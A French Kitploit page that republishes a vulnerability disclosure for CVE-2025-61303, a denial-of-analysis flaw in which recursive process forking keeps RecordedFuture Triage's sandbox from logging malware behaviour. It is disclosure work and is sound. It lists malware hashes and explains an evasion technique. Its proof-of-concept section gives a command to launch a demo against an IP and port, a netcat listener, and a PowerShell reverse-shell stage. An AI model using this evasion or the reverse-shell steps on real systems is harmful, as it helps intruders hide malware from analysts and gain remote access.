Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-61303 — Vulnérabilité Critique (9.8) - Le moteur d'analyse dynamique RecordedFuture Triage peut ne pas enregistrer les comportements malveillants lorsque les échantillons produisent un fork de processus récursif à très haut volume, entraînant des rapports comportementaux incohérents ou manquants. | Kitploit
Outils/GitHubGitHub/egkritsis/cve-2025-61303
Analyse Dynamique (Sandboxing)Analyse des VulnérabilitésExploitationAnalyse de MalwareArticles et RechercheApprentissage et Éducation
GitHubegkritsis/cve-2025-61303

CVE-2025-61303

Voir le dépôt
24il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Vulnérabilité Critique (9.8) - Le moteur d'analyse dynamique RecordedFuture Triage peut ne pas enregistrer les comportements malveillants lorsque les échantillons produisent un fork de processus récursif à très haut volume, entraînant des rapports comportementaux incohérents ou manquants.

Partager

CVE-2025-61303 - Triage de RecordedFuture : Déni d'analyse par bifurcation récursive de processus

Description

Le sandbox Windows 10 build 2004 et Windows 10 LTSC 2021 de Triage de RecordedFuture contient une vulnérabilité critique dans son moteur d'analyse comportementale Windows qui permet à un échantillon de malware soumis d'éviter la détection et de provoquer un déni d'analyse. La vulnérabilité est déclenchée lorsqu'un échantillon crée récursivement un grand nombre de processus enfants, générant un volume élevé de journaux et épuisant les ressources système. En conséquence, un comportement malveillant clé, y compris l'exécution de PowerShell et l'activité de shell inversé, peut ne pas être enregistré ou signalé, induisant les analystes en erreur et compromettant l'intégrité et la disponibilité des résultats d'analyse du sandbox.


Score CVSS

CVSS v3.1 : 9,8 (Critique)
Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H



Auteurs / Chercheurs

  • Evgenios Gkritsis — Département d'Informatique, Université d'Économie et de Commerce d'Athènes, Grèce
  • Constantinos Patsakis — Département d'Informatique, Université du Pirée, Grèce
  • George Stergiopoulos — Département d'Informatique, Université d'Économie et de Commerce d'Athènes, Grèce

  • Détails

    L'échantillon vathos_rev.exe (SHA256 : 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b) démontre une condition de déni d'analyse dans le moteur d'analyse comportementale Windows de Triage de RecordedFuture.
    Lorsqu'il est déclenché sous les configurations Windows 10, l'échantillon crée récursivement des milliers de processus enfants, épuisant les ressources de suivi des processus et de journalisation. En conséquence, le sandbox signale un minimum de données comportementales et ne parvient pas à enregistrer les actions malveillantes clés.


    Environnement Windows 10 v2004

    • Plateforme : win10v2004-20250610-en
    • Architecture : x64
    • Temps max noyau : 104s
    • Temps max réseau : 213s
    • Score comportemental rapporté : 1/10
    • Signature détectée : « Utilisation suspecte de WriteProcessMemory » (64 IoC)
    • Comportement observé :
      • Récursion continue de processus de vathos_rev.exe
      • Aucune exécution PowerShell ou activité de shell inversé enregistrée
      • Trafic réseau limité (uniquement requêtes DNS et HTTP standard)
      • Aucun rappel C2 ni télémétrie de charge utile capturée

    Environnement Windows 10 LTSC 2021

    • Plateforme : win10ltsc2021-20250619-en
    • Architecture : x64
    • Temps max noyau : 105s
    • Temps max réseau : 215s
    • Score comportemental rapporté : 1/10
    • Signature détectée : « Utilisation suspecte de WriteProcessMemory » (64 IoC)
    • Activité des processus observée :
      • Récursion continue de processus de vathos_rev.exe
      • Aucune exécution PowerShell ou activité de shell inversé enregistrée
      • Trafic réseau limité (uniquement requêtes DNS et HTTP standard)
      • Aucun rappel C2 ni télémétrie de charge utile capturée

    Dans les deux environnements sandbox Windows 10, le déclenchement n'a pas réussi à capturer les étapes attendues d'exécution PowerShell et de shell inversé, bien que le malware exécute ces comportements sur l'hôte.

    Le moteur d'analyse comportementale du sandbox est devenu saturé par la création récursive de processus, entraînant une télémétrie tronquée ou manquante.

    Cela confirme une vulnérabilité de déni d'analyse : le moteur comportemental ne parvient pas à signaler l'activité malveillante en cas de récursion élevée et de volume de journaux important, entraînant des faux négatifs et une sortie médico-légale incomplète.

    Référence du rapport public :
    https://tria.ge/250822-qfystshk51


    Impact

    Il s'agit d'une vulnérabilité de déni d'analyse dans Triage de RecordedFuture qui peut empêcher le moteur d'analyse dynamique de capturer ou de rapporter l'activité comportementale. L'exploitation permet aux adversaires de contourner la détection comportementale et de produire des rapports d'analyse incomplets ou manquants.

    Impacts clés :

    • Évitement de la détection : Un comportement malveillant peut ne pas être enregistré, faisant apparaître les menaces comme bénignes.
    • Fausse confiance : Des analyses à faible score avec une télémétrie manquante peuvent induire les analystes en erreur.
    • Évitement réutilisable : La technique peut être intégrée dans des chargeurs/gouttes et réutilisée dans des campagnes.
    • Facilité d'exploitation : Reproductible sans expertise approfondie, augmentant le risque d'abus massif.

    Conséquences en aval :

    • IoC manqués
    • Mauvaise classification des menaces avancées
    • Chronologies médico-légales incomplètes

    Produits concernés

    • Produit : Triage de RecordedFuture (Plateforme d'analyse dynamique)
    • Composant affecté : Moteur d'analyse comportementale Windows
    • Échantillon de malware : vathos_rev.exe
      • SHA256 : 3c52178c27d2a0336f6286f6cf0a4a253a507273b1a19303edcacb39d2659a4b
      • MD5 : dca2fc8f69f6493c7a9c1ce9a68b2454
      • SHA1 : 9b4688ba4788e34bce47d91b0accc98d33dbf8d2
      • SHA512 : 924e866dfce8abaee30f94bf78254777b6f7fd6a35d091402a984c233a8f0cbd104ebe34559037356697ae39613781ca90bd5e9f2b6542309090e806ec5f674b
      • Taille : 270 Ko

    Détonations vulnérables observées (rapports Triage publics)

    Environnement Windows 10 LTSC 2021

    • ID du rapport : 250822-qfystshk51
    • Plateforme : win10ltsc2021-20250619-en
    • Architecture : x64
    • Soumis : 2025-08-22 13:12 UTC
    • Signalé : 2025-08-22 13:18 UTC

    Environnement Windows 10 Version 2004

    • ID du rapport : 250822-qfystshk51
    • Plateforme : win10v2004-20250610-en
    • Architecture : x64
    • Soumis : 2025-08-22 13:12 UTC
    • Signalé : 2025-08-22 13:18 UTC

    Remarque : Les détails de la version du moteur et de la version interne ne sont pas divulgués publiquement par RecordedFuture.
    Toutes les observations sont basées sur des détonations publiques reproductibles de la plateforme Triage de RecordedFuture (soumission 250822-qfystshk51).


    Preuve de concept (PoC)

    Résumé (bref)

    La démo fournie reproduit la condition de déni d'analyse (DoA) en générant un volume très élevé de processus et une activité d'exécution profondément imbriquée. La démo crée de nombreux processus enfants et effectue un déchiffrement XOR multi-tours avant une étape finale de shell inversé PowerShell. Dans les images Windows 10 vulnérables de Triage, l'étape finale de la charge utile n'est pas enregistrée ou est tronquée, tandis que d'autres images (par exemple, Windows 11) capturent le comportement complet.

    Comment exécuter

    root@kitploit:~
    poc/vathos_demo.exe <IP> <PORT>
    

    Démarrez un écouteur (par exemple, nc -lvp 4444) sur l'IP/port spécifié pour observer les tentatives de connexion. La démo crée un très grand nombre de processus et effectue un déchiffrement XOR multi-tours, aboutissant à une étape de shell inversé PowerShell. Dans les configurations Triage affectées, l'étape finale de la charge utile peut ne pas être enregistrée bien que l'échantillon l'exécute sur l'hôte.

    Figure 1 - Tableau de bord d'aperçu Triage Figure 1 - Tableau de bord d'aperçu Triage

    Figure 2 - Rapport comportemental Windows 10 v2004 (télémétrie minimale / exemple DoA) Figure 2 - Rapport win10 v2004 (télémétrie minimale)

    Figure 3 - Rapport comportemental Windows 10 LTSC 2021 (télémétrie minimale / exemple DoA) Figure 3 — Rapport win10 LTSC 2021 (télémétrie minimale)

    Figure 4 - Exemple de processus enregistrés dans Windows 10 LTSC (nettoyé, pas tous les processus enregistrés) — journaux d'analyse → Processus Figure 4 - Processus enregistrés dans win10 LTSC (nettoyé)


    Références

    • Analyse Triage publique : https://tria.ge/250822-qfystshk51
    • https://www.cve.org/CVERecord?id=CVE-2025-61303

    Télécharger l’outil